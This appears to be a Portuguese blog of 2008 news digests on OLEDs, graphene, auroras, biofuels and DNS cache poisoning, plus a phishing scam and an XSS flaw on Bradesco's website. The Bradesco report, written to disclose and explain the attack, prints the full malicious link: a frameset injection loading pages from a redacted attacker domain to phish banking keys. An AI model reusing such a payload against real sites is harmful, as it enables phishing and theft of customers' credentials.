Tetos que se iluminam por inteiro, telas planas mais eficientes e lâmpadas planas e transparentes são apenas algumas das possibilidades abertas pelos LEDs orgânicos, mais conhecidos como OLEDs(Organic Light Emitting Diodes).

Porque essa verdadeira maravilha da iluminação ainda não chegou ao mercado? Porque essas lâmpadas frias e de estado sólido possuem uma ineficiência intrínseca ao seu projeto, que faz com que apenas 20% da luz que elas produzem consiga sair de dentro do próprio OLED.

Óptica e nanotecnologia

Agora, os pesquisadores norte-americanos Stephen Forrest (Universidade de Michigan) e Yuri Sun (Universidade Princeton) juntaram óptica e nanotecnologia para dar um salto rumo à solução desse problema: eles aumentaram a iluminação fornecida por um OLED em 60%.

Segundo reportagem publicada na revista Nature Photonics, o OLED equipado com a nova tecnologia emite 70 lumens por watt de potência consumida. Uma lâmpada incandescente tradicional emite 15 lumens por watt, embora avanços recentes também na área da nanotecnologia estejam aumentado esse valor (veja Lâmpadas incandescentes ficam frias e 8 vezes mais eficientes).

As lâmpadas fluorescentes compactas chegam a produzir até 90 lumens por watt, mas sua luz irrita os olhos, elas são caras, duram menos do que o prometido e, pior de tudo, utilizam mercúrio.

Funcionamento do LED orgânico

No interior de um OLED, a luz branca é gerada quando um elétron atinge uma camada finíssima de materiais orgânicos que possuem propriedades semelhantes às dos materiais semicondutores (que são inorgânicos). O choque do elétron causa a emissão de um fóton.

O problema é que o fóton é disparado paralelamente à camada de material orgânico e não na perpendicular - para escapar de dentro do LED orgânico, o fóton deveria caminhar na vertical, na direção de quem olha para o dispositivo.

OLEDs estado da arte

LEDs orgânicos ganham 60% em eficiência e se aproximam da comercializaçãoO aumento na eficiência dos OLEDs foi conseguida combinando-se uma espécie de rede feita de materiais orgânicos (contendo carbono) funcionando em série com minúsculas microlentes que guiam para fora a luz que normalmente fica presa lá dentro. A rede reflete a luz, enviando-a na direção da lente de formato hemisférico, que se encarrega de dirigi-la para fora do LED.

Os pesquisadores afirmaram ter trabalhado com um OLED mais simples, mas não o mais eficiente disponível. Agora eles vão testar a sua nova tecnologia nos OLEDs estado da arte, avaliando as questões de custos, que poderão viabilizar ou não a sua comercialização.

Recentemente, pesquisadores brasileiros fizeram um importante avanço na área dos LEDs orgânicos, com uma pesquisa que foi capa de uma revista internacional - veja Descoberta brasileira em eletrônica orgânica é capa de revista internacional.

Fonte: Inovação Tecnológica

Brasileiros estão sujeitos a ataque que forja site em URL autêntica

A falha no sistema de nomes e domínios da internet (conhecido tecnicamente como DNS) já tem quase um mês de vida, mas os principais provedores de banda larga brasileiros parecem não ter se ajustado para evitar ataques decorrentes da brecha.

Levantamento feito pelo site IDG Now! indica que usuários que assinam serviços de banda larga das empresas Vivo, Net, Telefônica e Tim, sejam eles móveis ou fixos, podem estar suscetíveis aos ataques de redirecionamento de tráfego. A ameaça coloca em risco a privacidade e a integridade dos dados pessoais dos internautas.

Os primeiros ataques que exploram falhas no sistema de nomes e domínios da internet (conhecido tecnicamente como DNS) começaram a ser registrados no final da última semana, com a publicação de logs de redes internas com o desvio de tráfego.

No começo de julho, o pesquisador da consultoria IOActive, Dan Kaminsky, anunciou ter descoberto falhas no DNS que permitiriam que crackers, por meio de códigos maliciosos, redirecionassem domínios legítimos para páginas falsificadas que poderiam roubar dados do usuário.

Três semanas depois, o lançamento da nova versão do kit de hacking Metasploit, com códigos que permitiriam a exploração da brecha, fez com que o ataque se tornasse uma realidade.

O perigo da falha, explicada em detalhes técnicos pelo US-Cert, está relacionado tanto com a amplitude como com o silêncio dos ataques decorrentes. Tecnicamente, o malware faz com que o DNS seja enganado e, ao acessar a URL “idgnow.com.br”, por exemplo, direcione o usuário para o IP determinado pelo cracker.

Caso o servidor DNS de um provedor seja comprometido pelo malware, em ataque conhecido como “envenenamento de DNS”, milhões de usuários podem ser redirecionados sem qualquer alerta para páginas falsas que mimetizem o site original, em uma espécie de phishing potencializado e difícil de ser acusado sem ferramentas técnicas.

E de quem é a responsabilidade de corrigir o problema?

Dos provedores. O IDG Now! usou um teste oferecido pelo próprio Kaminsky em seu blog pessoal que indica se a conexão usada está completamente vulnerável ao ataque, se existem falhas que podem ser exploradas ou se o problema foi totalmente corrigido.

Testes realizados em 3 diferentes conexões do Speedy, da Telefônica, indicaram que há a possibilidade de ataques - nas duas primeiras, o teste indicou que o DNS poderia ser “envenenado”, enquanto o terceiro apontou que o problema estava parcialmente corrigido.

Em testes feitos com o Virtua, da Net, checagens feitas em conexões em horários diferentes na segunda-feira (28/07) indicaram a vulnerabilidade durante a manhã e a tarde. Durante a noite, os testes indicaram que o problema havia sido parcialmente contornado.

Entre conexões sem fio, o problema também é perceptível. Medições envolvendo usuários dos serviços VivoZap, da operadora Vivo, e Claro 3G, da Claro, indicaram falta de proteção adequada contra o “envenenamento” de cachê.

Em comunicado, a Claro afirma que já conta “com a ativação da assinatura DNS Cache Poison em seu Sistema de Prevenção (IPS)”, o que possibilita o uso de portas aleatórias para consulta de DNS e evita o ataque.

Procurados pela reportagem do IDG Now!, Vivo, Net, Telefônica e Tim não se pronunciaram antes do fechamento da matéria.

O problema não é exclusivo de provedores brasileiros. Em seu blog HackerFactor, Neal Krawetz listou todos os provedores pelo mundo que ofereciam riscos semelhantes a seus usuários.

Segundo ele, os principais provedores norte-americanos, como Earthlink, Spinklink e Comcast, ainda oferecem riscos a seus usuários. A Verizon também estava na lista, mas foi riscada após corrigir o problema.

Vale esclarecer que a indicação de uma conexão possivelmente suscetível ao ataque pelo teste de Kaminsky não significa que toda a infra-estrutura do provedor pode estar comprometida com o “envenenamento”, já que a atualização pode estar em curso.

Por outro lado, Krawetz explica em post sobre os métodos de exploração da falha que o fato do provedor ter sucesso no teste de Kaminsky significa apenas que a estrutura está corrigida “contra o método desenvolvido” pelo pesquisador.

“No entanto, algumas correções não lidam bem necessariamente com o método genérico de envenenamento de cachê de DNS. Mais uma vez, se o provedor perceber um fluxo de pacotes de resposta DNS, podem estudar outros passos para evitar o ataque”, explica Krawetz.

Fonte: IDG Now!

Confira uma batalha de “Star Wars: The Clone Wars”

Foi lançado na web mais um vídeo promocional de “Star Wars: The Clone Wars”, longa de animação da epopéia espacial criada por George Lucas que se passará entre os episódios II e III da saga cinematográfica. O clipe mostra uma seqüência de batalha quase completa.

O filme é uma continuação da microssérie co-produzida e exibida pelo Cartoon Network em 2006, mostrando os famosos personagens da hexalogia “Star Wars” no meio das sangrentas Guerras Clônicas.

A missão de Anakin Skywalker na fita será resgatar o filho do gângster Jabba, o Hutt, da mão dos separatistas. Enquanto isso, Obi-Wan Kenobi negocia a paz entre o clã dos hutts e a República Galática. No entanto, Darth Sidious e seus asseclas têm planos que objetivam ver essa frágil aliança ser despedaçada, tentando forçar um conflito entre os hutts e os jedi.

“Star Wars: The Clone Wars” servirá como o piloto da série de TV homônima que será lançada ainda este ano nos EUA. O filme chegará às salas de cinema do Brasil e dos EUA em 15 de agosto.

Este e outros dois clips podem ser conferidos aqui.

Fonte: Cinema Com Rapadura

terça-feira, 29 de julho de 2008

Golpe virtual da TV LCD confirma compra e instala vírus

Uma mensagem em circulação apresenta ao internauta a confirmação de uma compra que ele não fez: a de uma TV LCD de 40 polegadas, compatível com a tecnologia da TV digital, por R$ 2.899. O e-mail é enviado em nome de uma grande loja de comércio eletrônico e tem como objetivo roubar informações dos internautas.

O texto diz que a compra foi aprovada e os valores serão creditados de acordo com as informações contidas no cadastro. Em seguida, oferece um link malicioso para o internauta clicar, caso necessite de mais informações.

“Ao acessar o site sugerido, essa página tenta instalar no computador o programa Mal_banker, de uma família de códigos maliciosos que podem capturar dados bancários, monitorar a navegação dos internautas ou servir de porta de entrada para outros malwares”, afirmou a empresa de segurança Trend Micro, que analisou o e-mail a pedido do G1.

Texto oferece ao destinatário dois links: ambos levam ao mesmo site malicioso.

A estratégia pode funcionar quando as vítimas se desesperam com a possibilidade de pagar por um produto que não compraram, clicando no link sugerido para obter mais informações. Outra alternativa que potencializa o golpe é a oferta desse mesmo link, caso o internauta deseje “cancelar a compra em caráter de urgência”.

Phishing

Esse tipo de golpe é chamada de phishing scam. Com ele, golpistas enviam e-mails sugerindo que os internautas baixem programas, cliquem em links ou visitem sites maliciosos. Quando seguem a sugestão, as vítimas em potencial podem infectar seus computadores com programas geralmente desenvolvidos para o roubo de informações financeiras.

“Os usuários têm de ficar atentos para as informações e solicitações repentinas, principalmente por e-mails de desconhecidos e de estabelecimentos no qual o usuário não fez nenhum cadastro anterior e nenhuma compra”, alerta a Trend Micro.

Fonte: G1

Pesquisadores registram 1º ataque a falha no sistema de domínios online

Os primeiros ataques que exploram falhas no sistema de nomes e domínios da internet (conhecido tecnicamente como DNS) começaram a ser registrados no final da última semana, com a publicação de logs de redes internas com o desvio de tráfego.

James Kosin, entusiasta de sistemas Linux, publicou na lista Fedora List, o registro das tentativas de acesso de sua conexão a domínios de serviços populares, como eBay, Search Live, Gmail, Google e MySpace, todas negadas após 30 tentativas.

O registro demonstra a incapacidade do servidor DNS em questão em “transformar” o domínio em IP para conectar o usuário ao site pretendido, função primordial do DNS e passível de ser afetada com a exploração da brecha revelada no começo do mês.

Kosin não deixa claro qual provedor usado para sua banda larga.

No começo de julho, o pesquisador Dan Kaminsky anunciou que havia descoberto falhas no sistema DNS que permitiriam que, usando malwares, crackers conseguissem redirecionar URLs legítimas para sites falsos com visual parecido ao original.

Na quinta-feira (24/07), o kit de hacking Metasploit ganhou nova versão que integrava o código necessário para explorar a falha em grande escala - a invasão de um servidor DNS poderia comprometer milhões de internautas que usam a conexão de determinado provedor.

Ainda que as correções oferecidas pelos fabricantes de equipamentos estejam disponíveis, não são todos os provedores que já atualizaram seus DNS, algo comprovado pelo registro de Kosin.

Fonte: IDG Now!

REVISTAS: VEJA nº 2071

Nome do Lançamento: VEJA Cadê os Bebês, 30 de Julho de 2008
Tamanho: 34MB
Links: Homepage
Download: Multi-Servidor

Podcast VidaNerd.com - Episódio 07

icon for podpress

Falha no site do Bradesco permitiu ataque XSS

Criminosos brasileiros conseguiram descobrir um problema em uma página do Bradesco que permitia que a mesma fosse “alterada” por meio de links, possibilitando o uso do domínio do banco para todo tipo de atividade maliciosa.

Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma página localizada em institucional.bradesco.com.br. Se clicado, o link enviava informações à página que causavam um comportamento indesejável, fazendo com que argumentos da query string — como é chamada a parte do link depois do ponto de interrogação (”asp?…”) — fossem inseridas como código, permitindo o ataque.

Dias antes da publicação desta matéria, a Linha Defensiva notificou o Bradesco. O banco removeu a página vulnerável dentro de aproximadamente 48 horas, inutilizando o ataque.

A mensagem contendo o link que explorava a brecha solicitava o recadastramento das “chaves de segurança” usadas nas transações através da Internet, convidando o usuário a fazê-lo por meio do link.

Como é demonstrado na imagem, a maioria dos navegadores e os programas de e-mails não exibem o endereço completo de uma URL, se esta for muito extensa, não permitindo que a existência do golpe seja percebida.

Embora o e-mail tenha usado uma técnica refinada que facilmente poderia enganar até mesmo usuários com certa experiência, devido ao link camuflado, erros de ortografia característicos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-mail em massa usado pelos criminosos não era compatível com caracteres especiais, como acentos.

Informações técnicas a respeito do ataque estão disponíveis abaixo.

XSS

Cross Site Scripting, ou XSS, é um tipo de vulnerabilidade onde determinada página de internet não filtra suficientemente as informações enviadas pelo navegador web, sendo possível fazê-la exibir conteúdos de outros sites, ou conteúdos especificados no próprio link ou outra informação.

Um exemplo clássico é a página de busca. Em geral, páginas de buscas exibem na tela a informação que está sendo procurada (por exemplo, “Você está procurando por: [termo de pesquisa]“). Se a exibição desta informação não for filtrada corretamente, a informação, em vez de exibida, será interpretada como código HTML pelo navegador, possibilitando o ataque.

Fóruns, livros de visitas e blogs (este último, devido à função de comentários) podem ser vítimas do XSS permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetará qualquer usuário que o ver. Este é o ataque de XSS persistente, ou tipo 2.

O Bradesco foi alvo do XSS impermanente ou não-persistente, também chamado de XSS tipo 1.

O objetivo de ataques XSS é geralmente roubar informações importantes da vítima, tais como os cookies de autenticação. Porém, XSS também pode ser usado para alterar os sites e usar da confiança depositada pelo internauta na página para persuadi-lo a enviar informações sigilosas, ou para rodar código malicioso nos PCs de visitantes.

A Linha Defensiva já noticiou a respeito de brechas semelhantes no YouTube e no Orkut.

Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-mail e similares não sejam clicados, a não ser quando estava-se esperando absolutamente o e-mail em questão (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que possível, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o que foi indicado no e-mail.

Brechas de XSS tipo 2 são difíceis de serem evitadas pelo usuário, sendo a responsabilidade do site nesses casos ainda maior, embora, em última instância, a responsabilidade sempre seja do site.

Detalhes Técnicos

O link malicioso usado pelos criminosos era:

http://institucional.bradesco.com.br/RedeAtendimento/Index_Pesquisa.asp?pesquisa=&titulo=%3C/title%3E%3Cframeset%20rows=%2228,*,23%22%20border=0%20style=%22border:0;%20margin:0%22%3E%3Cframe%20src=%22http://.com.br/completo/html/content/barra/index.shtml%22%20name=%22frm_top%22%20id=%22frm_top%22%20frameborder=%220%22%20scrolling=%22No%22%20noresize%20marginwidth=0%20marginheight=0%3E%3Cframe%20src=%22http://http://[DOMINIO MALICIOSO].com.br/completo/html/content/home/index.shtml%22%20name=%22conteudo%22%20id=%22conteudo%22%20frameborder=%220%22%20scrolling=%22auto%22%20noresize%20marginwidth=%220%22%20marginheight=%220%22%3E%3Cframe%20src=%22http://[DOMINIO MALICIOSO].com.br/completo/html/content/barra/bottom.shtml%22%20name=%22barraBottom%22%20id=%22barraBottom%22%20frameborder=%220%22%20scrolling=%22no%22%20noresize%20marginwidth=%220%22%20marginheight=%220%22%3E%3C/frameset%3E

Ao acessar o link, o internauta era direcionado para uma página do Bradesco (Index_Pesquisa.asp) que, vulnerável a XSS, carregava outra página, hospedada em um domínio brasileiro (cujo nome não foi divulgado por se tratar de um domínio legítimo comprometido).

Em ataques XSS, páginas legítimas são usadas de forma maliciosa e um código (no caso acima, um “IFRAME”) é inserido na página legítima. O conteúdo da página será, portanto, diferente do esperado.

Fonte: Linha Defensiva

Planeta Tio Fabio

Um dos candidatos à prefeitura de Fairhope (Alabama, EUA) na próxima eleição é consideravelmente mais peludo que os outros. Ele também tem duas pernas a mais que os concorrentes e um rabo que não pára de balançar. Ele é Willie Bean Roscoe P. Coltrane, um cão labrador de 7 anos de idade.

Willie foi inscrito como candidato por sua dona, Tress Turner, de 43 anos. Ela tem uma cafeteria na cidade e era "politicamente neutra" - até que um dos candidatos colocou uma placa em frente a seu estabelecimento comercial.

Tress não gostou e, depois que os diálogos com o candidato fracassaram, resolveu lançar seu próprio cachorro como concorrente.

Mas Willie Bean talvez não tenha nascido para a política. "Quando um cachorro pequeno late, ele corre", diz a dona.

O comitê eleitoral de Willie Bean funciona na cafeteria de Tress. É lá que os eleitores do cão labrador podem comprar camisetas e placas com a imagem do candidato. "Eu acho que ele vem para somar", diz Vince Kilborn, de 66 anos. "Precisamos de sangue novo", comemora.

Julie Ford, que trabalha como voluntária em um abrigo de animais da cidade, diz que Willie Bean está subestimando suas capacidades. "Ele deveria se lançar como presidente", diz a senhora de 61 anos.

Fonte: G1

Reação química na água abre o caminho para biocombustíveis de segunda geração

Pesquisadores chineses abriram definitivamente os caminhos para os biocombustíveis de segunda geração - aqueles que não competem com a produção de alimentos - ao descobrir uma reação que quebra a lignina da madeira, criando os compostos químicos básicos para produção dos biocombustíveis.

Quebra da lignina

A lignina é uma molécula complexa que mantém unidas as fibras da madeira, sendo o segundo polímero natural mais abundante depois da celulose. As reações conhecidas até hoje quebram a lignina de forma imprevisível, gerando uma grande gama de compostos químicos, sendo apenas alguns deles úteis para a produção dos biocombustíveis.

A lignina contém ligações carbono-oxigênio-carbono que unem pequenas cadeias de hidrocarbonos. A chave para a quebra da lignina é justamente quebrar essas ligações C-O-C, liberando os hidrocarbonos menores, que podem então ser tratados para produzir alcanos e álcool.

Quebra molecular seletiva

Mas a coisa não é tão simples, porque existem ligações C-O-C também dentro dos pequenos hidrocarbonos, que devem ser mantidas intactas, sob pena de inviabilizar a produção de álcool.

O método, desenvolvido pela equipe do Dr. Yuan Kou, da Universidade de Pequim, utiliza água pressurizada sob alta temperatura para alcançar esse equilíbrio delicado.

Biocombustíveis da madeira

Os pesquisadores fizeram seus primeiros testes com pó-de-serra, o resíduo gerado pela indústria madeireira. Mas virtualmente qualquer biomassa vegetal poderá ser tratada com a nova técnica.

Sob condições ideais, é teoricamente possível produzir monômeros e dímeros com rendimentos de 44 a 56% e de 28 a 29%, respectivamente, em termos de peso. Testando várias combinações de catalisadores e aditivos orgânicos, os cientistas chineses aproximaram-se muito desses níveis teóricos, obtendo 45% de monômeros e 12% de dímeros - o dobro do que já havia sido alcançado anteriormente.

Depois que a água é esfriada, os óleos separam-se dela naturalmente, resultando em três componentes: alcanos com oito ou nove átomos de carbono, adequados para a produção de gasolina, alcanos com 12 a 18 átomos de carbono, adequados para a produção de diesel, e metanol.

Aprimoramento do processo

Agora os pesquisadores planejam trabalhar na simplificação da técnica para torná-la economicamente viável. O processo demonstrado exige que a água esteja em um estado chamado de quase-crítico, com temperaturas entre 250 e 300º C e uma pressão ao redor de 7.000 kilopascals.

Fonte: Inovação Tecnológica

NanoNet: tecnologia gera circuitos verdadeiramente flexíveis

Pesquisadores da Universidade Purdue, nos Estados Unidos, conseguiram resolver um dos maiores obstáculos para a produção em larga escala de transistores de nanotubos de carbono.

NanoNet

A tecnologia, que os pesquisadores batizaram de NanoNet - uma rede em escala nanométrica, construída com transistores de nanotubos de carbono - poderá possibilitar imprimir circuitos eletrônicos sobre materiais plásticos para diversas aplicações, incluindo telas flexíveis e "peles eletrônicas" capazes de revestir um avião inteiro ou qualquer outra estrutura metálica, para monitorar a formação de fissuras em sua fuselagem.

Em escala de laboratório, os nanotubos de carbono já comprovaram sua capacidade de gerar transistores muito mais rápidos do que os atuais.

Em escala industrial, contudo, há um sério problema: os circuitos eletrônicos da NanoNet, formados pela deposição aleatória de nanotubos de carbono em uma estrutura parecida com uma rede de pesca, acabam sendo contaminada por nanotubos metálicos que se formam inevitavelmente durante a produção, que causam curto-circuitos.

Dividir para conquistar

A solução encontrada foi fatiar o circuito, o que quebra os nanotubos metálicos e evita os curto-circuitos. "Outros pesquisadores haviam sugerido eliminar esses nanotubos metálicos. Em vez disso, nós descobrimos uma forma incrível de essencialmente remover o efeito desses nanotubos metálicos sem removê-los de fato," explica o pesquisador John A. Rogers.

Para comprovar o funcionamento de um método aparentemente tão simples, mas que exigiu pesados cálculos de simulação para definir a melhor forma do corte, os pesquisadores construíram uma NanoNet com 100 transistores, a maior já feita até hoje e a primeira a demonstrar funcionalidade total, graças à ausência dos curto-circuitos.

"Agora não há mais nenhuma razão fundamental porque não possamos desenvolver as tecnologias NanoNet," diz Rogers. "Se você pode fazer um circuito flexível com 100 transistores, você pode fazer circuitos com 10.000 ou mais transistores."

Aplicações específicas

Mesmo depositados aleatoriamente, as redes de nanotubos são capazes de formar circuitos totalmente funcionais adequados a um grande número de aplicações, como telas flexíveis, mostradores que poderão se ajustar a qualquer superfície, por mais irregular que ela seja, e sensores de diversos tipos. A NanoNet, contudo, não seria adequada para circuitos de alta densidade, como os utilizados no interior dos processadores de computador.

Há poucos dias, um grupo de pesquisadores publicou uma forma diferente de produzir circuitos eletrônicos de nanotubos de carbono em escala industrial: veja Chips de nanotubos de carbono são demonstrados em escala industrial.

Fonte: Inovação Tecnológica

Moto elétrica chegará ao Brasil custando R$3.000,00

A Universidade Estadual de Campinas (Unicamp) e a concessionária de energia CPFL uniram-se para desenvolver uma nova motoneta elétrica que deverá estar disponível no mercado brasileiro em 2009.

Moto elétrica nacional

O objetivo é ter uma moto elétrica que custe em torno de R$ 3 mil, que possa ser financiada, que não faça ruídos e não cause poluição.

"A nossa meta de custo é fazer com que esse veículo seja competitivo com a moto tradicional à gasolina. Não vai poluir e vai fazer bem ao bolso de quem compra porque tem um custo por quilômetro operacional muito menor que o da gasolina," afirmou o vice-presidente de Gestão de Energia da CPFL, Paulo Cezar Coelho Tavares.

Autonomia e velocidade máxima

O primeiro protótipo da moto elétrica brasileira esteve em exposição durante a reunião da SBPC, que aconteceu em Campinas (SP). A cooperação com a Unicamp visa resolver dois problemas técnicos antes que a moto elétrica comece a ser comercializada.

O primeiro desafio é fazer com que o veículo tenha uma autonomia maior, em torno de 150 quilômetros - hoje a moto consegue rodar apenas 50 quilômetros antes que suas baterias precisem ser recarregadas. O segundo desafio é aumentar a velocidade final do veículo - o protótipo tem uma velocidade máxima de 60 km/h.

Baterias mais eficientes

Além disso, o tempo atual de recarga das baterias é de 4 horas e o objetivo é reduzi-lo para 2 horas. "Essa moto tem baixo custo de transporte, na faixa de 1 centavo por quilômetro. O objetivo é desenvolver uma nova tecnologia para melhorar a bateria e também a economicidade do projeto, fazendo com que essa bateria dê mais autonomia, mas a um custo que compense," disse Tavares.

De acordo com Luiz Antônio Rossi, coordenador do Núcleo Interdisciplinar de Planejamento Energético (Nipe) da Unicamp, que será responsável pelo desenvolvimento da moto elétrica, as pesquisas se concentrarão em áreas como a otimização da tração do veículo em diferentes condições de uso e tipos de terreno encontrados no Brasil, ampliação de autonomia e redução do tempo de recarga da bateria.

Uma das primeiras modificações deverá ser a substituição das baterias, que no protótipo são de baterias chumbo-ácidas comuns, como as utilizadas em automóveis. A opção deverá recair nas baterias de íons de lítio, menores, mais leves e com maior densidade de carga.

Fonte: Inovação Tecnológica

Proteção da propriedade intelectual no Brasil é desigual e relativa

Sérgio Paulino, do INPI e da Unicamp, afirma que a capacidade de apropriação da propriedade intelectual no Brasil é restrita e relativa. "A lei de patentes é ótima para alguns e péssima para outros", afirma ele.

O impacto e a importância da legislação sobre propriedade intelectual no Brasil no dia-a-dia das empresas e dos laboratórios acadêmicos são completamente distintos. O poder de proteção desse tipo de propriedade muda de acordo com variáveis como o setor empresarial, a área do conhecimento e a tecnologia envolvida.

Tudo é desigual

"Os diferentes tipos de aproveitamento da propriedade intelectual no Brasil dependem da posição dos indivíduos como agentes econômicos, o que envolve variáveis como origem e acesso ao capital, e do nível de competência tecnológica industrial e científica dos pesquisadores", explicou Sérgio Paulino, assistente da presidência do Instituto Nacional da Propriedade Industrial (INPI).

Segundo o economista, que também é professor do curso de especialização em gestão e inovação tecnológica na Unicamp, 12 anos depois da criação da Lei da Propriedade Industrial, de 1996, os usuários desse tipo de regulamentação no Brasil ainda não entendem com clareza os benefícios oferecidos pela legislação.

Atraso no exame dos pedidos de patentes

"Do ponto de vista das patentes, ainda não podemos dizer quais são os impactos da legislação, apesar de sabermos que eles são diferentes. Esse quadro não é muito claro uma vez que ainda não conseguimos torná-lo trabalhável. Isso é frustrante e se justifica, em parte, pela própria capacidade de exame de patentes, que não é linear e também não está atrasada igualmente em todos os setores industriais. O atraso das análises varia muito", afirmou.

Paulino reconheceu as desvantagens desse atraso, como, por exemplo, a perda de competitividade da indústria farmacêutica nacional. "Esse setor foi fortemente impactado em termos regressivos nas últimas décadas, perdendo capacidade de disputa no mercado exatamente pela falta de reconhecimento de patentes nessa área", disse.

Ótima para alguns e péssima para outros

Ele disse ainda que a capacidade de apropriação da propriedade intelectual no Brasil é absolutamente restrita e relativa, o que faz com que a lei de patentes não seja nem muito boa nem muito ruim. "Ela é ótima para alguns e péssima para outros, dependendo do setor de atividades e de cada leitura, percepção, incentivo ou perda, que serão sempre diferentes", sinalizou ele.

Fonte: Inovação Tecnológica

segunda-feira, 28 de julho de 2008

Descoberta a origem das Auroras Boreais


Descoberta a origem das Auroras Boreais

Utilizando os cinco satélites da missão THEMIS e mais uma rede de 20 observatórios terrestres, localizados ao longo do Canadá e do Alaska, os cientistas finalmente desvendaram o mistério do magnífico espetáculo das Auroras Boreais.

Origem das Auroras Boreais

Sua origem está em explosões de energia magnética que ocorrem a um terço da distância entre a Terra e a Lua, explosões estas que alimentam "subtempestades" que causam brilhos repentinos e rápidos movimentos da Aurora Boreal, também conhecidas como Luzes do Norte (Ártico) e Luzes do Sul (Antártica).

O elemento fundamental do fenômeno é um processo chamado reconexão magnética, um processo bastante comum e que ocorre por todo o Universo quando linhas de campos magnéticos sob pressão assumem repentinamente um novo formato, tal como uma borracha que tenha sido esticada além do seu ponto de ruptura.

"Nós descobrimos o que faz as Luzes do Norte dançarem," disse o professor Vassilis Angelopoulos, da Universidade da Califórnia, e coordenador dos estudos.

Efeitos das tempestades espaciais

A descoberta tem grande interesse para a indústria de telecomunicações e de distribuição de energia elétrica. As subtempestades freqüentemente acompanham intensas tempestades espaciais que podem interromper as comunicações de rádio e os sinais de GPS, além de causar quedas no fornecimento de energia.

Agora que resolveram o mistério de onde, quando e como as subtempestades ocorrem, os pesquisadores poderão construir modelos mais realísticos e prever a intensidade e os efeitos de cada subtempestade.

Satélites sincronizados

Lançados em Fevereiro de 2007, os cinco satélites idênticos da missão Themis (Time History of Events and Macroscale Interactions during Substorms) alinham-se uma vez a cada quatro dias ao longo da linha do Equador e fazem observações sincronizadas com os 20 observatórios terrestres.

Cada estação terrestre utiliza um magnetômetro e uma câmera apontada para cima para determinar onde e quando uma subtempestade boreal vai começar. Os instrumentos medem a luz das auroras por meio de partículas fluindo ao longo do campo magnético da Terra e das correntes elétricas que essas partículas geram.

Durante cada alinhamento, os satélites capturam dados que permitem aos cientistas apontar com precisão onde, quando e como as subtempestades medidas pelo observatórios terrestres se desenvolveram no espaço.

Fonte: Inovação Tecnológica

Grafeno é confirmado como o material mais forte que existe

Pesquisadores da Universidade de Colúmbia, nos Estados Unidos, confirmaram que o grafeno - uma folha de carbono com apenas um átomo de espessura - é o material mais forte que o homem já conseguiu medir.

Material mais forte do mundo

"Nossa pesquisa coloca o grafeno como o material mais forte já medido, cerca de 200 vezes mais forte do que o aço estrutural," diz o pesquisador James Hone. "Seria necessário um elefante, equilibrado sobre a ponta de um lápis, para quebrar uma folha de grafeno [...]"

O Grafeno consiste em uma estrutura hexagonal de átomos de carbono, similar à dos favos de mel de uma colméia, mas com apenas um átomo de espessura. Como um material bidimensional, todos os seus átomos estão expostos na superfície. Quando uma folha de grafeno é enrolada, nascem os nanotubos de carbono. Mas desde 2006 já se sabia que o grafeno tinha propriedades ainda mais interessantes do que os nanotubos.

Medição prática

Até agora as propriedades do grafeno, como resistência, elasticidade e ponto de ruptura, eram baseados em teorias e modelagens em computador. Isso porque é muito difícil fabricar folhas de grafeno, por menores que sejam, totalmente livres de defeitos, para que suas propriedades possam ser verificadas sem nenhuma interferência.

"Nossa equipe contornou a questão do tamanho criando amostras pequenas o suficiente para serem livres de defeitos," diz o professor Jeffrey Kysar. Eles "cataram" suas folhas de grafeno em amostras microscópicas de grafite, colocando-as sobre furos circulares feitos em uma base de silício. O grafeno adere ao silício devido à atração entre seus átomos. O resultado é um furo microscópico tapado por uma membrana pura de grafeno.

Aplicações eletrônicas e estruturais

Os cientistas testaram a resistência dessa membrana forçando para baixo o seu centro com a ajuda da ponta de diamante de um microscópio de força atômica. A pureza de cada membrana, medindo cerca de um micrômetro de diâmetro, permitiu que fossem testados a elasticidade e o ponto de ruptura. Os cientistas coletaram dados de 67 testes, feitos em 23 amostras de grafeno.

Ainda não existe tecnologia para fabricar grandes folhas de grafeno livres de defeitos, que possam ser utilizadas em aplicações estruturais. Mas folhas de dimensões microscópicas já foram utilizadas para fabricar o menor transístor do mundo e um transístor inovador, 50 vezes mais rápido do que os atuais.

A medição agora realizada é também essencial para que os pesquisadores saibam quais são os limites que eles poderão alcançar quando desenvolverem os materiais do futuro.

Fonte: Inovação Tecnológica

O primeiro coração artificial integral não vai bater

Pesquisadores de várias universidades norte-americanas uniram-se em um projeto de pesquisa cujo objetivo é desenvolver um coração totalmente artificial, com bombas independentes para substituir os ventrículos direito e esquerdo.

Coração que não bate

Além de buscar a substituição integral do coração doente, em todas as suas funcionalidades, a grande novidade do novo coração artificial é que ele não vai bater - em vez das tradicionais bombas pulsantes, ele utilizará duas bombas rotativas de fluxo, absolutamente silenciosas e sem vibrações.

O projeto está em fase de simulação e agora os cientistas estão analisando o impacto que as novas bombas terão sobre o sangue. Antes que o novo coração que não bate seja testado em animais é necessário saber com precisão como as células sangüíneas e as plaquetas se comportarão.

"Como essas bombas serão implantadas para uso a longo prazo, nós temos que ter certeza que o dano ao sangue será mínimo," diz o professor Matteo Pasquali. Dois tipos de problemas são mais preocupantes: a liberação excessiva de hemoglobina pelas glóbulos vermelhos - o que seria tóxico para os rins e para o fígado - e o processo de ativação das plaquetas - que podem induzir à formação de aglomerados de glóbulos brancos que podem entupir pequenos vasos sangüíneos.

Sincronismo entre os ventrículos

Outra preocupação dos engenheiros é como fazer com que as bombas respondam de forma pronta, mas suave, às necessidades variáveis de sangue apresentadas pelo corpo - como quando a pessoa se exercita ou sobe escadas rapidamente, por exemplo.

Também está merecendo especial atenção o sincronismo entre as bombas que substituirão os dois ventrículos. "O coração tem uma capacidade de auto-regulação embutida," explica Pasquali. "Como as duas bombas que formam o coração artificial integral contornam o coração [natural] totalmente, é importante embutir um mecanismo para a regulação no dispositivo. De outra forma você poderá ter um acúmulo de sangue nos pulmões se a bomba esquerda estiver bombeando muito lentamente em relação à bomba direita."

Testes em animais

Os cientistas estão levando a utilização das tecnologias disponíveis ao extremo. Seu objetivo é construir um coração artificial que seja, ao mesmo tempo, pequeno o suficiente para ser implantado em uma criança, e potente o suficiente para bombear toda a necessidade de sangue de um adulto.

Os primeiros testes em animais, que serão feitos em bezerros, deverão começar assim que os cientistas confirmarem todas as previsões em seus simuladores.

Fonte: Inovação Tecnológica

